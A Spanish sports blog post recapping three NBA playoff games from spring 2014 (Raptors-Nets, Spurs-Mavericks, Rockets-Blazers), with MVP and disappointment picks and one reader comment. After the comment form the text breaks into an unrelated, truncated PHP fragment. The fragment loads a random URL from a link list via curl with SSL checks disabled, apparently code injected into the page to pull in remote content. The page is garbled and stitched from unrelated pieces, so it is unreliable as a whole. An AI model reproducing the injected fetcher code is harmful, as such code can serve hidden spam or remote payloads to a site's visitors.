La crónica: Vueltas a la tortilla

01 de May de 2014 por TheDeerHunter

Los Nets contra las cuerdas. Quién lo iba a decir tras el primer partido.
Sí, maese Sancho, toca hablar de que la experiencia a veces no es suficiente. Porque las piernas de Pierce y Garnett ya no son lo que eran, mientras que las de Lowry, DeRozan, Vasquez y Valanciunas funcionan a las mil maravillas. Alguien comentó que la rotación de los Nets daba miedo, y ayer se destaparon, además de la constante Joe Johnson, Teletovic y Alan Anderson. Suficiente para enjugar una desventaja de 26 puntos prácticamente en el último cuarto, pero no para lograr la victoria. Lowry resurgió para ganar. Inmenso en sus últimas acciones.

Después, los primeros minutos del Dallas-San Antonio engañaron a los aficionados que llenaron el AT&T Center hasta la bandera. Los Spurs salieron como un tiro y a los 6 minutos ganaban de 13, gracias a un Tony Parker virtualmente imparable. Los Mavs, en cambio estaban muy desacertados y tuvo que ser Vince Carter, que anoche le quitó el polvo al disfraz de Vinsanity, el que mantuviera a su equipo en el partido. Un pequeño arreón permitió a los locales irse 9 puntos arriba al descanso, diferencia que los Mavs no fueron capaces de recortar durante todo el 3er cuarto. Cuando llegó la hora de jugarse las habichuelas apareció Dirk Nowitzki, que anotó 14 puntos en apenas 6 minutos, pero cada canasta del alemán fue respondida inesperadamente por Tiago Splitter, cerrando un cuarto para enmarcar a base de puntos, rebotes en ataque y asistencias de fantasía. La tuvo el alemán a falta de 2 minutos para colocar a su equipo a solo 2 puntos, pero erró y los Spurs no volvieron a ceder ninguna oportunidad.

Terminamos con el “match-ball” que levantaron los Rockets. Qué hubiera sido de ellos de haberse confirmado la salida de Asik en su día. Por primera vez en la serie LaMarcus lo pasó mal bajo su defensa, mientras que Howard se conjuntaba con un insólito Jeremy Lin para recuperar cierto crédito. Lillard, Matthews y Lopez brillaron, pero se trata de un equipo tremendamente escaso y no se pueden permitir tal desaparición de algunos hombres clave. Harden fue un desastre ayer, pero no le echaron tanto de menos.

MVP: Increíble Kyle Lowry, especialmente en la primera mitad y en el final del partido.  La mejor actuación de su carrera y algunos esperábamos incluso algo más. 36 puntos y 6 asistencias que dieron el oxígeno a los Raptors para poner la serie a favor.

La sorpresa: El año pasado fue tristemente decisivo en la derrota de los Spurs en la final. Anoche devolvió una parte a los suyos con una actuación mágica. Tiago Splitter, 17 puntos, 12 rebotes y 5 asistencias cuando el balón quema más. ¿Duelo Nowitzki-Splitter? Pero ¿Qué me estás contando?

La decepción: La dupla Pierce-Garnett, raza de campeones. -31 y -15 respectivamente. Probablemente la peor actuación conjunta de sus carreras.

El mayor esfuerzo en vano: Dos candidatos claros. Por un lado Joe Johnson con sus 30 puntos, 5 rebotes y 3 asistencias para estar a punto de levantarle el partido a los Raptors y, por el otro, Damian Lillar rozando el triple doble.

Comenta

Un comentario a esta entrada

  1. Ruxixon dice:
    #1

    Apareció a última hora pero Harden me deja malas sensaciones,poniendo el contrapunto a Howard,que le hemos dado hasta en el cielo de la boca (merecidamente),pero esta haciendo una serie buenísima,siendo muy agresivo en el ataque,respondiendo a las necesidades de su equipo,ya no nos acordábamos de esa versión de DH12.

    Una pena que se vaya acabando esta ronda,ha sido/está siendo una maravilla.Esta noche complicadísimo elegir,el Indiana@Atlanta con los de Georgia haciendo un llamamiento a sus aficionados bajando el precio de las entradas,el Oklahoma @ Memphis con Durant criticado por la prensa de Oklahoma City llamándole Mr.Unreliable (de locos) y el Clippers@Warriors con el ambiente del Oracle de siempre.I love this game.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>